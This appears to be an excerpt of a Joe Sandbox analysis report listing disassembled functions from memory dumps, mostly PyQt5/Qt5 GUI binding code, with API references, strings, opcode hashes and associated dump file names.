Associated: 0000000F.00000002.2691515219.00007FFD8763A000.00000004.00000001.01000000.00000040.sdmpDownload File
Associated: 0000000F.00000002.2691572339.00007FFD8763C000.00000002.00000001.01000000.00000040.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd87590000_check.jbxd

Similarity

API ID: CompareStringUnicode_With$MallocMem_SubtypeType_
String ID: NFC$NFD$NFKC$NFKD$invalid normalization form
API String ID: 2156454041-3528878251
Opcode ID: da3b54f35a8fb496e7d97c3fec9d3f2a0cbd8ed79af4ca103da2bfe7283e7162
Instruction ID: a77c7881014495fe47066e09146eb400d9c1d8b0bbb89fb0c71143f6c6930fef
Opcode Fuzzy Hash: da3b54f35a8fb496e7d97c3fec9d3f2a0cbd8ed79af4ca103da2bfe7283e7162
Instruction Fuzzy Hash: E7515B21B9C262C2FF629B26F5757BA63B0BB42BC0F0450B1DA4E86B81DE2DE545D700

Function 00007FFD86282CE0 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 126windowCOMMON

Download Yara Rule

APIs

??0QBrush@@QEAA@AEBVQColor@@W4BrushStyle@Qt@@@Z.QT5GUI ref: 00007FFD86282D9C
?setBrush@QPalette@@QEAAXW4ColorGroup@1@W4ColorRole@1@AEBVQBrush@@@Z.QT5GUI ref: 00007FFD86282DAD
??1QBrush@@QEAA@XZ.QT5GUI ref: 00007FFD86282DB7
??0QBrush@@QEAA@AEBVQColor@@W4BrushStyle@Qt@@@Z.QT5GUI ref: 00007FFD86282E80
?setBrush@QPalette@@QEAAXW4ColorGroup@1@W4ColorRole@1@AEBVQBrush@@@Z.QT5GUI ref: 00007FFD86282E94
??1QBrush@@QEAA@XZ.QT5GUI ref: 00007FFD86282E9E

Strings

BEEJ1, xrefs: 00007FFD86282D0F
QPalette, xrefs: 00007FFD86282EF5
setColor, xrefs: 00007FFD86282EEE
BEJ1, xrefs: 00007FFD86282E19
setColor(self, acg: QPalette.ColorGroup, acr: QPalette.ColorRole, acolor: Union[QColor, Qt.GlobalColor])setColor(self, acr: QPalette.ColorRole, acolor: Union[QColor, Qt.GlobalColor]), xrefs: 00007FFD86282EE3

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Brush@@Color$?setBrushBrush@Brush@@@Color@@Group@1@Palette@@Qt@@@Role@1@Style@
String ID: BEEJ1$BEJ1$QPalette$setColor$setColor(self, acg: QPalette.ColorGroup, acr: QPalette.ColorRole, acolor: Union[QColor, Qt.GlobalColor])setColor(self, acr: QPalette.ColorRole, acolor: Union[QColor, Qt.GlobalColor])
API String ID: 195731697-1709835509
Opcode ID: 201c4111b578e05f3c8c2969d9a4b63c7cda5a57461c59ec6786b6ae00f6e4cf
Instruction ID: dad69c0193a7bedf5a85e8a0271ff97274e65d093418c3e9d2e2cb448fe7e321
Opcode Fuzzy Hash: 201c4111b578e05f3c8c2969d9a4b63c7cda5a57461c59ec6786b6ae00f6e4cf
Instruction Fuzzy Hash: EB612836709F46C9EB508F29E8942AD33B4FB58BA8F550132EA4D43B28EF38D955C700

Function 00007FFD8629AE60 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75COMMON

Download Yara Rule

APIs

??0?$QVector@VQPoint@@@@QEAA@XZ.QT5CORE ref: 00007FFD8629AEDA
?begin@?$QVector@VQPoint@@@@QEBAPEBVQPoint@@XZ.QT5CORE ref: 00007FFD8629AEFE
?receivers@QObject@@IEBAHPEBD@Z.QT5CORE ref: 00007FFD8629AF0C
PyLong_FromLong.PYTHON3 ref: 00007FFD8629AF3A
??1QByteArray@@QEAA@XZ.QT5CORE ref: 00007FFD8629AF48
??1QByteArray@@QEAA@XZ.QT5CORE ref: 00007FFD8629AF70

Strings

receivers(self, signal: PYQT_SIGNAL) -> int, xrefs: 00007FFD8629AF7D
BP0, xrefs: 00007FFD8629AE86
QRegularExpressionValidator, xrefs: 00007FFD8629AF90
receivers, xrefs: 00007FFD8629AF89
pyqt5_get_signal_signature, xrefs: 00007FFD8629AEC1

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Array@@BytePoint@@@@Vector@$??0?$?begin@?$?receivers@FromLongLong_Object@@Point@@
String ID: BP0$QRegularExpressionValidator$pyqt5_get_signal_signature$receivers$receivers(self, signal: PYQT_SIGNAL) -> int
API String ID: 842024227-504698696
Opcode ID: d38197111e4a18c1e2fac09e576c9771414a0c82227f584037d5218ef6429d13
Instruction ID: 99867310a8d4851e0638c95fca1ef113aebf2c29bf017687e5192fbae45536c2
Opcode Fuzzy Hash: d38197111e4a18c1e2fac09e576c9771414a0c82227f584037d5218ef6429d13
Instruction Fuzzy Hash: A131F571B0CA0692EB009F28E8A85BD73A5FB98BA4F554172DA4E43364EF3DD949C700

Function 00007FFD86296D40 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 112COMMON

Download Yara Rule

APIs

?drawPicture@QPainter@@QEAAXAEBVQPointF@@AEBVQPicture@@@Z.QT5GUI ref: 00007FFD86296DCF
?drawPicture@QPainter@@QEAAXAEBVQPoint@@AEBVQPicture@@@Z.QT5GUI ref: 00007FFD86296E8A
?drawPicture@QPainter@@QEAAXAEBVQPoint@@AEBVQPicture@@@Z.QT5GUI ref: 00007FFD86296F03

Strings

drawPicture(self, p: Union[QPointF, QPoint], picture: QPicture)drawPicture(self, x: int, y: int, p: QPicture)drawPicture(self, pt: QPoint, p: QPicture), xrefs: 00007FFD86296F15
QPainter, xrefs: 00007FFD86296F27
BJ9J9, xrefs: 00007FFD86296EAC
BJ1J9, xrefs: 00007FFD86296D60
BiiJ9, xrefs: 00007FFD86296E2A
drawPicture, xrefs: 00007FFD86296F20

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?drawPainter@@Picture@Picture@@@$Point@@$Point
String ID: BJ1J9$BJ9J9$BiiJ9$QPainter$drawPicture$drawPicture(self, p: Union[QPointF, QPoint], picture: QPicture)drawPicture(self, x: int, y: int, p: QPicture)drawPicture(self, pt: QPoint, p: QPicture)
API String ID: 2325107402-2799232556
Opcode ID: 1b7064dd5612b60308e20e2a7faa746ab58961d13735a822d9afff506df0017e
Instruction ID: b5c90681c036c9e03c5d7ba502c4e7fdcde870d7b2b627c398c63ab3b8762ec4
Opcode Fuzzy Hash: 1b7064dd5612b60308e20e2a7faa746ab58961d13735a822d9afff506df0017e
Instruction Fuzzy Hash: 4B51F376B08F4689EB508F65E8942ED37B4FB48BA8F550136DA8D43B28EF38D954C740

Function 00007FFD8626ADC0 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 71COMMON

Download Yara Rule

APIs

?document@QSyntaxHighlighter@@QEBAPEAVQTextDocument@@XZ.QT5GUI ref: 00007FFD8626AE57
?setCurrentBlockUserData@QSyntaxHighlighter@@IEAAXPEAVQTextBlockUserData@@@Z.QT5GUI ref: 00007FFD8626AE8A
_Py_Dealloc.PYTHON3 ref: 00007FFD8626AEBA
?setCurrentBlockUserData@QSyntaxHighlighter@@IEAAXPEAVQTextBlockUserData@@@Z.QT5GUI ref: 00007FFD8626AED0

Strings

B@J8, xrefs: 00007FFD8626ADE6
qtgui_wrap_ancestors, xrefs: 00007FFD8626AE36
setCurrentBlockUserData(self, data: Optional[QTextBlockUserData]), xrefs: 00007FFD8626AEF8
setCurrentBlockUserData, xrefs: 00007FFD8626AF04
QSyntaxHighlighter, xrefs: 00007FFD8626AF0B

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: BlockUser$Highlighter@@SyntaxText$?setCurrentData@Data@@@$?document@DeallocDocument@@
String ID: B@J8$QSyntaxHighlighter$qtgui_wrap_ancestors$setCurrentBlockUserData$setCurrentBlockUserData(self, data: Optional[QTextBlockUserData])
API String ID: 404146120-4063405994
Opcode ID: c9721c29888373b5255e7ee7329b2e31fe059bb087d412007704f0e9e6eea005
Instruction ID: d8c7020fd76a40ad076794d8b1810a513175236022e29c085694793e062b99d9
Opcode Fuzzy Hash: c9721c29888373b5255e7ee7329b2e31fe059bb087d412007704f0e9e6eea005
Instruction Fuzzy Hash: B441C775B08B4681EB109F55E8A93AD73A4FB48BA0F854476CA8D43720EF3CE889C700

Function 00007FFD8628E230 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 67COMMON

Download Yara Rule

APIs

??0QTransform@@QEAA@XZ.QT5GUI ref: 00007FFD8628E259
??0QFont@@QEAA@XZ.QT5GUI ref: 00007FFD8628E274
?prepare@QStaticText@@QEAAXAEBVQTransform@@AEBVQFont@@@Z.QT5GUI ref: 00007FFD8628E32C
??1QFont@@QEAA@XZ.QT5GUI ref: 00007FFD8628E34B
??1QFont@@QEAA@XZ.QT5GUI ref: 00007FFD8628E36D

Strings

prepare, xrefs: 00007FFD8628E386
QStaticText, xrefs: 00007FFD8628E38D
B|J9J9, xrefs: 00007FFD8628E2F1
prepare(self, matrix: QTransform = QTransform(), font: QFont = QFont()), xrefs: 00007FFD8628E37A

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Font@@$Transform@@$?prepare@Font@@@StaticText@@
String ID: B|J9J9$QStaticText$prepare$prepare(self, matrix: QTransform = QTransform(), font: QFont = QFont())
API String ID: 3100109759-2356018664
Opcode ID: 81dbdb06435be0a6ec976ef3620f2441d65ad0a3069683e8d0c6a1f0dc8a4ff9
Instruction ID: 567e4a88299b9759d1e86dade57c4d03854830306efb3529d3d1c8fb0f0aa8f0
Opcode Fuzzy Hash: 81dbdb06435be0a6ec976ef3620f2441d65ad0a3069683e8d0c6a1f0dc8a4ff9
Instruction Fuzzy Hash: 2841E93660CB86D6DB609B15F4943EAB3A4FB887A0F544132DA8D43B28DF3CD599CB00

Function 00007FFD86276EA0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 94COMMON

Download Yara Rule

APIs

??0?$QVector@VQPoint@@@@QEAA@XZ.QT5CORE ref: 00007FFD86276ECF
?addFileAttachment@QPdfWriter@@QEAAXAEBVQString@@AEBVQByteArray@@0@Z.QT5GUI ref: 00007FFD86276F9E
??1QString@@QEAA@XZ.QT5CORE ref: 00007FFD8627700D
??1QString@@QEAA@XZ.QT5CORE ref: 00007FFD8627701C

Strings

addFileAttachment(self, fileName: Optional[str], data: Union[QByteArray, bytes, bytearray], mimeType: Optional[str] = ''), xrefs: 00007FFD86277029
BJ1J1|J1, xrefs: 00007FFD86276F68
QPdfWriter, xrefs: 00007FFD8627703B
addFileAttachment, xrefs: 00007FFD86277034

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: String@@$??0?$?addArray@@0@Attachment@ByteFilePoint@@@@Vector@Writer@@
String ID: BJ1J1|J1$QPdfWriter$addFileAttachment$addFileAttachment(self, fileName: Optional[str], data: Union[QByteArray, bytes, bytearray], mimeType: Optional[str] = '')
API String ID: 418137946-1237079823
Opcode ID: 38e24058b277e0c45276016bc7dc86dfd13842d10fe472455c0db9649c0fab32
Instruction ID: c4978c9d5ef6352b2cb41b94820c69ce097725aa6ff973f79eec64dab469aeed
Opcode Fuzzy Hash: 38e24058b277e0c45276016bc7dc86dfd13842d10fe472455c0db9649c0fab32
Instruction Fuzzy Hash: 2E51F536709B86D9DB108F65E4942ED77B8FB48BA8F444136EA8D43B28EF38D554C700

Function 00007FFD86294EC0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 82COMMON

Download Yara Rule

APIs

?data@QStandardItem@@UEBA?AVQVariant@@H@Z.QT5GUI ref: 00007FFD86294FA3
??0QVariant@@QEAA@$$QEAV0@@Z.QT5CORE ref: 00007FFD86294FAF
??0QVariant@@QEAA@$$QEAV0@@Z.QT5CORE ref: 00007FFD86294FCD
??1QVariant@@QEAA@XZ.QT5CORE ref: 00007FFD86294FDB

Strings

data(self, role: int = Qt.UserRole+1) -> Any, xrefs: 00007FFD86295013
data, xrefs: 00007FFD8629501F
QStandardItem, xrefs: 00007FFD86295026
B|i, xrefs: 00007FFD86294F4E

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Variant@@$A@$$V0@@$?data@Item@@Standard
String ID: B|i$QStandardItem$data$data(self, role: int = Qt.UserRole+1) -> Any
API String ID: 2353902712-1287057684
Opcode ID: 0977b4009ee21516267765f3c52322486b8379fc6667af227ede1f8abf7b515c
Instruction ID: fa7375568d5eeb1beac1b4e46957d804d338d4c5d00fcbfac5677d858bc5fd51
Opcode Fuzzy Hash: 0977b4009ee21516267765f3c52322486b8379fc6667af227ede1f8abf7b515c
Instruction Fuzzy Hash: 8C413D31708B8686EB509B15F8647AEB7A4FF85BA4F444075DA8D03B68DF3CD948C700

Function 00007FFD86245020 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 106COMMON

Download Yara Rule

APIs

?drawCursor@QTextLayout@@QEBAXPEAVQPainter@@AEBVQPointF@@H@Z.QT5GUI ref: 00007FFD862450C3
?drawCursor@QTextLayout@@QEBAXPEAVQPainter@@AEBVQPointF@@HH@Z.QT5GUI ref: 00007FFD862451A2

Strings

drawCursor(self, p: Optional[QPainter], pos: Union[QPointF, QPoint], cursorPosition: int)drawCursor(self, p: Optional[QPainter], pos: Union[QPointF, QPoint], cursorPosition: int, width: int), xrefs: 00007FFD862451ED
QTextLayout, xrefs: 00007FFD862451FF
BJ8J1ii, xrefs: 00007FFD86245127
drawCursor, xrefs: 00007FFD862451F8
BJ8J1i, xrefs: 00007FFD8624505A

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?drawCursor@Layout@@Painter@@PointText
String ID: BJ8J1i$BJ8J1ii$QTextLayout$drawCursor$drawCursor(self, p: Optional[QPainter], pos: Union[QPointF, QPoint], cursorPosition: int)drawCursor(self, p: Optional[QPainter], pos: Union[QPointF, QPoint], cursorPosition: int, width: int)
